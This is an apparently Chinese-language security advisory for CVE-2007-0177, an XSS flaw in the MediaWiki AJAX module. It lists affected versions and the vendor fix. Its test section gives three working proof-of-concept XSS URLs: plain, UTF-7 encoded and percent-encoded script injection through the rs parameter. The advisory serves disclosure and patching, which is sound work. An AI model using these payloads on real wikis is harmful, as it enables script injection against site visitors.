发布日期：2007-01-09
更新日期：2007-04-16

受影响系统：

MediaWiki MediaWiki <=1.9.0rc2
MediaWiki MediaWiki <=1.8.3
MediaWiki MediaWiki <=1.7.2
MediaWiki MediaWiki <=1.6.9

描述：

---

BUGTRAQ  ID: 21956
CVE(CAN) ID: CVE-2007-0177

MediaWiki是著名的wiki程序，运行于PHP+MySQL环境。

MediaWiki 1.6.9、1.7.2、1.8.3、1.9.0rc2之前版本的AJAX模块内存在XSS漏洞，在启用了wgUseAjax后，远程攻击者可注入任意Web脚本或HTML。

<*来源：Moshe Ben-Abu
  
  链接：http://xforce.iss.net/xforce/xfdb/31359
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

v1.8.2 and below: http://www.example.com/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.example2.com')%3C/script%3E v1.8.3 - v1.9.2 http://www.example.com/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.example2.com');+ADw-/SCRIPT+AD4- http://www.example.com/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D

建议：

---

厂商补丁：

MediaWiki
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://wikipedia.sourceforge.net/

浏览次数：2781
严重程度：0（网友投票）